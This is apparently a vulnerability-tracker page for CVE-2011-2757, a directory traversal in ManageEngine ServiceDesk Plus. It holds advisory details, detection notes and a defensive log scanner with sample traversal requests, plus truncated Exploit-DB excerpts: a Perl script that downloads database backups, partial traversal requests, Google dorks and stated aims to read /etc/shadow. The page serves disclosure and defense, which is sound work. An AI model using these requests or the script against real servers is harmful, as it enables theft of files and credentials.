CVE-2011-2757
Published: 2011-07-17
Priority P3 · 45 · medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 39.37% (98.4th percentile)
Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0.0.12 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the FILENAME parameter. NOTE: this might overlap the US-CERT VU#543310 issue.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| manageengine | servicedesk_plus | <= 8.0.0.12 | — |
| manageengine | servicedesk_plus | — | — |
| manageengine | servicedesk_plus | — | — |
| manageengine | servicedesk_plus | — | — |
Detection & IOCs
- The vulnerability affects ManageEngine ServiceDesk Plus build 9110 and lower per the Metasploit module, but the NVD entry and original exploits reference version 8.0.0.12 and earlier; ensure detection coverage spans both version ranges.
- The vulnerability also affects ManageEngine Support Center Plus (not just ServiceDesk Plus); detection rules should cover both products' /workorder/FileDownload.jsp endpoints.
- On Windows, exploitation can yield SYSTEM-level file reads; on Linux, root-level file reads are possible if the service runs as root. Severity of detections should reflect privilege context.
- The fix for ServiceDesk Plus was released as Service Pack Build 8012; the fix for Support Center Plus was released as patch 7803. Verify patched build numbers when triaging alerts.
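A log check along the lines of the notes above, as an added example (not part of the original page or of any indexed rule): it flags access-log requests to /workorder/FileDownload.jsp whose FILENAME value contains a `..` path segment after repeated URL-decoding. The combined log format, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ENDPOINT = "/workorder/filedownload.jsp"  # path named on this page for both products
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2011:10:00:01 +0000] "GET /workorder/FileDownload.jsp?module=agent&&FILENAME=..%2F..%2F..%2Fexample.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2011:10:00:02 +0000] "GET /workorder/FileDownload.jsp?module=agent&FILENAME=..%255c..%255cexample.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Jul/2011:10:00:03 +0000] "GET /workorder/FileDownload.jsp?module=agent&FILENAME=report..v2.pdf HTTP/1.1" 200 2048',
    '192.0.2.10 - - [10/Jul/2011:10:00:04 +0000] "GET /index.jsp?FILENAME=..%2Fnotes.txt HTTP/1.1" 404 0',
]

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e is still seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_filename(line):
    """Return the decoded FILENAME value if the line is a traversal attempt, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    path = decode_fully(target.path).split(";")[0].lower()
    if not path.endswith(ENDPOINT):
        return None
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key.upper() != "FILENAME":
            continue
        # Normalise Windows separators, then look for a '..' path segment.
        name = decode_fully(value).replace("\\", "/")
        if ".." in name.split("/"):
            return name
    return None

def scan(lines):
    """Return (line_number, decoded FILENAME) for every flagged line."""
    hits = [(n, traversal_filename(l)) for n, l in enumerate(lines, start=1)]
    return [(n, name) for n, name in hits if name is not None]

if __name__ == "__main__":
    for lineno, name in scan(SAMPLE_LOG):
        print(f"line {lineno}: traversal in FILENAME -> {name}")
```

Matching on a whole `..` segment rather than the substring keeps names such as `report..v2.pdf` from raising alerts.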
No detection rules found.
Exploit-DB
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
exploitdb·2011-07-07
---
```perl
# Exploit Title: ManageEngine ServiceDesk new();
$url="http://127.0.0.1";
$path="/workorder/FileDownload.jsp";
$installPath=&getInstallPathWin($url,$path);
if ($installPath ne "") {
    @backups=&getServerOutLogs($url,$path,$installPath);
} else {
    print "Install path not found :(\n";
    exit();
}
if (scalar(@backups)>0) {
    print "hehe.. We got paths to backup files..\n If they are
on the same drive and exists - we will own their world!!\n";
    foreach $backLine (@backups) {
        @backInfo=split(/ --- /,$backLine);
        #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
        &downloadBackups($url,$path,$backLine);
    }
}
unlink("bad");
print "Dude, check out \'db_backups.html\'\n";
sub downloadBackups {
my ($url,$path
```
Exploit-DB
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
exploitdb·2011-06-23
---
Google Dork: ie: intitle:ManageEngine ServiceDesk Plus"
Author: Keith Lee ([email protected]), @keith55,
http://milo2012.wordpress.com
Software Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
Version: 8.0
Description:
Directory traversal vulnerabilities have been found in ManageEngine ServiceDesk Plus 8.0, a web-based helpdesk system written in Java.
The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use "../" sequences to move up to the root directory, thus permitting navigation through the file system.
Request:
GET http://[webserver IP]:8080/workorder/FileDownload.jsp?module=agent&&F
Exploit-DB
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
exploitdb·2011-06-23
---
Advisory:
ManageEngine Support Center Plus 7.8 build 0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server and because Support Center Plus runs as root/Administrator by default it's possible to access files owned by superusers too.
This, for example, makes it possible to grab the "/etc/shadow" file on a Linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shado
Metasploit
ManageEngine ServiceDesk Plus Path Traversal
metasploit
This module exploits an unauthenticated path traversal vulnerability found in ManageEngine ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem with the same privileges as Support Center Plus is running. On Windows, files can be retrieved with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).
No writeups or analysis indexed.